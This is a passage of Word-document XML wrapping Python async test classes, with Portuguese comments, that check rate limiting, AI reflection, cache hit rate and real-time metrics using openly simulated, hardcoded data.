    <w:p w14:paraId="3C7C9569" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "rate_limit_active": blocking_rate &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CBF01" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B84561" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A8708" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B3438" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F1AFE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B432A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C6147" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C8B0E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="rate_limiting",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEF5CA6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC20780" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA68001" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6089A3A4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57BF65" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10563FFD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E18C86" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="02D8D2B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class AIEvolutionTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531773E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Testa capacidades de IA e auto-evolução"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5D662" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE554D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB53CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A975F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDDE52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_ai_reflection(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446BC37" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa reflexão de IA"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF6E4F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D27AEEE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EBF52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE84FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular teste de reflexão de IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F306301" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            reflection_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5304B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "code_analyzed": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7C049" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "improvements_suggested": 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C87D05" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "confidence_score": 0.85,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071141C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "reflection_time": 0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D7A92" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF40B62" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636567FF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445380B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527DFFF0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D08602" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="ai_reflection",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1E32D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B651720" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20352867" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details=reflection_data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BC1F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D3D09" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B3200" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E09F885" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90144E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567D645" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B93D80D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="ai_reflection",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D45366" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69904073" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E057828" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF8474" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E91B87" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1C529" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A859BCC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B6BC27" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_cache_performance(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375CCBE1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa performance do cache de IA"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E065AEB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAD498" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1AA25C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD386C8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular teste de cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE65496" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cache_hits = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0247E599" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cache_misses = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3FCFAA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E5F42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for i in range(100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14696828" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Simular consulta ao cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD7FB4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                if i % 3 == 0:  # 33% cache hit rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8E692" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    cache_hits += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A24222" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFFD0C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    cache_misses += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BA860" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E73DBF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            hit_rate = cache_hits / (cache_hits + cache_misses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52389E2E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611923B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C6852" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBACBC8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7828A81F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="cache_performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC69FD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS" if hit_rate &gt; 0.2 else "FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE5784" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A03215" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ADFBEA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "cache_hits": cache_hits,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA600E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "cache_misses": cache_misses,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D3692" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "hit_rate": hit_rate,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A34FBD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_queries": cache_hits + cache_misses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436D130" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3603FBE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E28742" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BC25E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C96B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FEF35F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB7E3F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B6FE98" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="cache_performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751E08B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FE75F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC0E2A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB83540" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFC9D8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F2508" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C7B46" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="7621FE53" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class MonitoringTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126A473" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Testa sistema de monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127F91A4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43030D74" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672802EA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504BACE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F249D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_real_time_metrics(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC6238" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa coleta de métricas em tempo real"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140C73F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D28B1FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D40817C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB45EB1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular coleta de métricas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A194D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metrics_collected = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D74B66" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537485B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for i in range(10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A621F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                metric = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D31249" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "timestamp": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667137E2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "cpu_usage": 45 + (i * 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079D03D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "memory_usage": 60 + (i * 1.5),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3686A7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "active_agents": 8 + (i % 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8B458" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B8196" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                metrics_collected.append(metric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F74DBB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                await asyncio.sleep(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326DCA8A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
